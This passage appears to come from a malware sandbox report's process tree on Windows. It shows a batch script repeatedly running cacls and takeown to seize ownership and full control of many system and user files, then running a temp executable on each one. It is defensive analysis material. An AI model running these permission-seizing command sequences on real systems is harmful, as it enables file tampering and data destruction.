    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.27ef3c59-c716-4c8b-9a73-63ef3515451c.1.etl" /E /G Admin:F /C
    3⤵
    PID:2648
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.27ef3c59-c716-4c8b-9a73-63ef3515451c.1.etl"
    3⤵
    PID:2088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "WuProvider.27ef3c59-c716-4c8b-9a73-63ef3515451c.1.etl" -nobanner
    3⤵
    PID:3232
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "WuProvider.27ef3c59-c716-4c8b-9a73-63ef3515451c.1.etl" -nobanner
      4⤵
      PID:3012
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:780
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""
  2⤵
  PID:2648
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"
    3⤵
    PID:272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3232
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3256
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""
  2⤵
  PID:2484
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"
    3⤵
    - Modifies file permissions
    PID:3336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3012
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:780
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""
  2⤵
  PID:2864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:780
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:2424
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1564
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""
  2⤵
  PID:3424
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"
    3⤵
    - Modifies file permissions
    PID:2864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2088
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1196
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml""
  2⤵
  PID:2864
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml" /E /G Admin:F /C
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml"
    3⤵
    - Modifies file permissions
    PID:2484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner
    3⤵
    PID:3256
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner
      4⤵
      PID:2452
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3012
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml""
  2⤵
  PID:2484
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml" /E /G Admin:F /C
    3⤵
    PID:3232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml"
    3⤵
    PID:3588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner
    3⤵
    PID:2088
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner
      4⤵
      PID:780
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3232
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml""
  2⤵
  PID:3588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml" /E /G Admin:F /C
    3⤵
    PID:3228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml"
    3⤵
    - Modifies file permissions
    PID:2484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftWordpad.xml" -nobanner
    3⤵
    PID:3256
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftWordpad.xml" -nobanner
      4⤵
      PID:3432
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\Network\Downloader\edb.log""
  2⤵
  PID:2484
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Network\Downloader\edb.log" /E /G Admin:F /C
    3⤵
    PID:3012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Network\Downloader\edb.log"
    3⤵
    - Modifies file permissions
    PID:1140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "edb.log" -nobanner
    3⤵
    PID:3800
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "edb.log" -nobanner
      4⤵
      PID:3336
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3588
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml""
  2⤵
  PID:1564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml" /E /G Admin:F /C
    3⤵
    PID:3232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml"
    3⤵
    - Modifies file permissions
    PID:2452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftNotepad.xml" -nobanner
    3⤵
    PID:2864
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftNotepad.xml" -nobanner
      4⤵
      PID:272
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml""
  2⤵
  PID:3232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml" /E /G Admin:F /C
    3⤵
    PID:3228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml"
    3⤵
    PID:3588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner
    3⤵
    PID:2864
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner
      4⤵
      PID:1564
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3348
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml""
  2⤵
  PID:780
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml" /E /G Admin:F /C
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml"
    3⤵
    PID:3336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "NetworkPrinters.xml" -nobanner
    3⤵
    PID:2452
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "NetworkPrinters.xml" -nobanner
      4⤵
      PID:3348
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""
  2⤵
  PID:3232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "KnownGameList.bin" -nobanner
    3⤵
    PID:1140
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "KnownGameList.bin" -nobanner
      4⤵
      PID:3588
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat.LOG1""
  2⤵
  PID:3228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat.LOG1" /E /G Admin:F /C
    3⤵
    PID:3432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat.LOG1"
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "75fbd12bafcbd46e_COM15.dat.LOG1" -nobanner
    3⤵
    PID:2956
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "75fbd12bafcbd46e_COM15.dat.LOG1" -nobanner
      4⤵
      PID:3336
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2452
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl""
  2⤵
  PID:3232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl" /E /G Admin:F /C
    3⤵
    PID:3432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl"
    3⤵
    PID:272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl" -nobanner
    3⤵
    PID:2088
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "UpdateSessionOrchestration.09e7ff5b-1423-46b2-b532-1a0d4e606151.1.etl" -nobanner
      4⤵
      PID:3380
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2452
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat""
  2⤵
  PID:3588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat" /E /G Admin:F /C
    3⤵
    PID:292
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat"
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "75fbd12bafcbd46e_COM15.dat" -nobanner
    3⤵
    PID:3336
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "75fbd12bafcbd46e_COM15.dat" -nobanner
      4⤵
      PID:1596
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.1bbd813b-23ed-4820-84ee-a7fa0b2acf4e.1.etl""
  2⤵
  PID:2484
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.1bbd813b-23ed-4820-84ee-a7fa0b2acf4e.1.etl" /E /G Admin:F /C
    3⤵
    PID:292
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.1bbd813b-23ed-4820-84ee-a7fa0b2acf4e.1.etl"
    3⤵
    - Modifies file permissions
    PID:1256
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "NotificationUxBroker.1bbd813b-23ed-4820-84ee-a7fa0b2acf4e.1.etl" -nobanner
    3⤵
    PID:1140
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "NotificationUxBroker.1bbd813b-23ed-4820-84ee-a7fa0b2acf4e.1.etl" -nobanner
      4⤵
      PID:1196
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1""
  2⤵
  PID:3884
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1" /E /G Admin:F /C
    3⤵
    PID:1256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1"
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "settings.dat.LOG1" -nobanner
    3⤵
    PID:1140
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "settings.dat.LOG1" -nobanner
      4⤵
      PID:2088
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""
  2⤵
  PID:3800
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C
    3⤵
    PID:3348
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"
    3⤵
    PID:292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
    3⤵
    PID:3232
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
      4⤵
      PID:3380
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2020
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat""
  2⤵
  PID:64
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C
    3⤵
    PID:3588
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat"
    3⤵
    PID:3380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "settings.dat" -nobanner
    3⤵
    PID:2844
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "settings.dat" -nobanner
      4⤵
      PID:272
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3012
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""
  2⤵
  PID:2420
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin" /E /G Admin:F /C
    3⤵
    PID:3800
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin"
    3⤵
    PID:3432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
    3⤵
    PID:292
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "TileCache_100_0_Data.bin" -nobanner
      4⤵
      PID:1140
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2808
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:1680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    - Modifies file permissions
    PID:1140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:2808
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:1564
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2484
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
  2⤵
  PID:3228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3352
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"
    3⤵
    - Modifies file permissions
    PID:292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2916
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:2648
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2252
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BR5q1uBg.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml""
  2⤵
  PID:1564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml" /E /G Admin:F /C
    3⤵
    PID:1196
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013.xml"
    3⤵
    PID:364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cIzGULwq.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner
    3⤵
    PID:844
  - - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
      cIzGULwq.exe -accepteula "MicrosoftInternetExplorer2013.xml" -nobanner
      4⤵
      PID:3220
- - C:\Users\Admin\AppData\Local\Temp\cIzGULwq.exe
    cIzGULwq.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2420
- C:\Windows\SysWOW64\cmd.exe
